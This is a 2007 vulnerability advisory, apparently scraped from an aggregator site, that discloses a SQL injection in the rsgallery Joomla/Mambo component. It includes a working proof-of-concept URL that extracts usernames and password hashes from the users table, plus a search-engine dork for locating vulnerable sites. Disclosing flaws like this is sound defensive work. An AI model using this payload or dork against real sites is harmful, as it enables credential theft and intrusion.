[ECHO_ADV_86$2007] Mambo/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability

2007-12-0500:00:00

vulners.com

JSON

ECHO_ADV_86$2007

[ECHO_ADV_86$2007] Mambo/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability

Author : M.Hasran Addahroni
Date : November, 30 th 2007
Location : Australia, Sydney
Web : http://advisories.echo.or.id/adv/adv86-K-159-2007.txt
Critical Lvl : Medium
Impact : System access
Where : From Remote

Affected software description:


Application   : rsgallery  
version       : &lt;= 2.0 beta 5
Vendor        : http://www.rsdev.nl/
Description :

RSGallery is one of the most complete Gallery solutions for Joomla at this point

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

Input passed to the &quot;catid&quot; parameter is not properly verified before being used to sql query. 
This can be exploited thru the browser and get the hash md5 password from users.
Successful exploitation requires that &quot;magic_quotes&quot; is off.


Poc/Exploit:
~~~~~~~~~

http://target.com/index.php?option=com_rsgallery&amp;page=inline&amp;catid=-1&#37;20union&#37;20select&#37;201,2,3,4,concat&#40;username,0x3a,password&#41;,6,7,8,9,10,11&#37;20from&#37;20mos_users--

Dork:
~~~~
Google  : &quot;option=com_rsgallery&quot; or inurl:Уindex.php?option=com_rsgalleryУ 



Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn on magic_quotes in php.ini
- use the latest version

Timeline:
~~~~~~~~

- 30 -11 - 2007 bug found
- 3  -12 - 2007 publish advisory
---------------------------------------------------------------------------

Shoutz:
~~~~
~ ping - my dearest wife, &#39;zizou&#39; zautha - my lovely son, for all the luv, the tears n the breath
~ y3dips,the_day,m0by,comex,z3r0byt3,c-a-s-e,S&#96;to,lirva32,pushm0v, az01,negative,the_hydra,neng chika, str0ke
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry,ketut,x16,k1tk4t,cyb3rh3b,opt1lc
~ [email protected]
~ everyone [at] mac.web.id forum
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

JSON

[ECHO_ADV_86$2007] Mambo/Joomla Component rsgallery &lt;= 2.0 beta 5 &#40;catid&#41; Remote SQL Injection Vulnerability

[ECHO_ADV_86$2007] Mambo/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability

Author : M.Hasran Addahroni Date : November, 30 th 2007 Location : Australia, Sydney Web : http://advisories.echo.or.id/adv/adv86-K-159-2007.txt Critical Lvl : Medium Impact : System access Where : From Remote

[ECHO_ADV_86$2007] Mambo/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability

Author : M.Hasran Addahroni
Date : November, 30 th 2007
Location : Australia, Sydney
Web : http://advisories.echo.or.id/adv/adv86-K-159-2007.txt
Critical Lvl : Medium
Impact : System access
Where : From Remote